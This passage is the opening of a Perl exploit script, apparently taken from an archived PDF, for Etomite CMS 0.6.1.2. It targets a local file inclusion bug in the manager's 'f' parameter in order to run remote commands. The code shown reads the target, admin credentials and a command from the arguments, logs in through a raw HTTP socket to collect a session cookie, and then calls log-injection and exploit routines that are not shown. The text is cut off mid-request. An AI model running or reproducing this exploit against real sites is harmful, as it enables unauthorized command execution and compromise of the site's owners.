1 #!/usr/bin/perl −w
2 #
3 # Etomite CMS Remote Command Execution
4 # Version: 0.6.1.2
5 # Url: http://www.etomite.org
6 # Author : Alfredo Pesoli ’revenge’
7 # Description:
8 #
9 # Input passed to the ’f’ parameter in "/manager/index.php" isn’t properly verified before being used in an include f
unction, this can be exploited to include local files on target host or execute command, we need admin credentials to
exploit this vuln.
10 #
11 # http://www.0xcafebabe.it
12 # <revenge@0xcafebabe.it>
13
14 use strict;
15 use IO::Socket;
16
17 if ( @ARGV < 5 ) { &usage(); }
18
19 my $target = $ARGV[0];
20 my $username = $ARGV[1];
21 my $password = $ARGV[2];
22 my $path = $ARGV[3];
23 my $cmd = "";
24 my $cookie = "";
25 my $uagent = "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian)";
26
27 for ( my $i=4; $i<=$#ARGV; $i++ ) {
28 $cmd.= "+".$ARGV[$i];
29 }
30
31 $cookie = &authenticate();
32
33 &inject_logfile();
34
35 &sploit();
36
37 sub authenticate() {
38 my $res;
39 my $tmp;
40
41 print "\n −= Getting auth cookie =−\n\n";
42 my $sock = IO::Socket::INET−>new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
43 my $req = "rememberme=0&location=&username=".$username."&password=".$password."&thing=&submit=Login&licenseOK=on";
44 print $sock "POST ".$path."processors/login.processor.php HTTP/1.1\r\n";
45 print $sock "Host: ".$target."\r\n";
46 print $sock "User−Agent: ".$uagent."\r\n";
47 print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
48 print $sock "Accept−Language: it−it,it;q=0.8,en−us;q=0.5,en;q=0.3\r\n";
49 print $sock "Accept−Encoding: gzip,deflate\r\n";
50 print $sock "Accept−Charset: ISO−8859−1,utf−8;q=0.7,*;q=0.7\r\n";
Page 1/3
Etomite CMS 0.6.1.2 managerindex.php Local File Include Exploit
Revenge
11/16/2006
51 print $sock "Connection: close\r\n";
52 print $sock "Referer: http: